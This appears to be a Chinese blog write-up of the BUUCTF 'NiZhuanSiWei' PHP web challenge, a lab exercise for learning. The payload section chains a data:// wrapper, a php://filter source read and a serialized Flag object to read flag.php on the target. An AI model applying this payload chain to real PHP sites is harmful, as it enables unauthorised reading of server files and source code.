【BUUCTF-Web 0024】[ZJCTF 2019]NiZhuanSiWei

Subject

逆轉(zhuǎn)思維 PHP偽協(xié)議 PHP反序列化


Mind Palace

訪問(wèn)url獲得代碼:

image

preg_match ( string pattern , stringsubject , array &matches = ? , intflags = 0 , int $offset = 0 ) : int => 執(zhí)行匹配正則表達(dá)式

Payload:

url/index.php
?text=text= data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
                      data://text/plain,welcome to the zjctf
&file=          php://filter/read=convert.base64-encode/resource=useless.php => useless.php
&password=  O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

第一個(gè)繞過(guò):用data偽協(xié)議寫(xiě)入文件

第二個(gè)繞過(guò):用php://filter讀取base64編碼后的源碼 + base64解碼:

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

第三個(gè)繞過(guò)(反序列化):

image

Look Ahead

PHP學(xué)的不夠扎實(shí);

PHP偽協(xié)議總結(jié): https://segmentfault.com/a/1190000018991087


References:

https://www.cnblogs.com/wangtanzhi/p/12184759.html

https://segmentfault.com/a/1190000018991087


<p align="center">END (?▽?)/</p>

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • CTF_web 1、PHP中md5()函數(shù)無(wú)法處理數(shù)組,如果傳入的為數(shù)組,會(huì)返回NULL 2、PHP有備份文件時(shí),...
    aport閱讀 1,024評(píng)論 0 0
  • 2018/3/16 17:34:51 WEB題 1.簽到題 題目:key在哪里? writeup:查看源代碼即可獲...
    Sec小玖閱讀 22,591評(píng)論 1 11
  • 新手練習(xí)區(qū) view-source F12得到flag。 get_post HackBar一把梭。 robots ...
    NoelleMu閱讀 6,235評(píng)論 3 3
  • title: ddctf-2019 webdate: 2019-04-20 19:11:35tags:- CTF-...
    Miracle778閱讀 1,189評(píng)論 0 1
  • 原來(lái)國(guó)賽就是CISCN......buuoj上題目挺全的,干脆選一些比較有價(jià)值的題目復(fù)現(xiàn)下: Hack World...
    byc_404閱讀 3,790評(píng)論 0 3

友情鏈接更多精彩內(nèi)容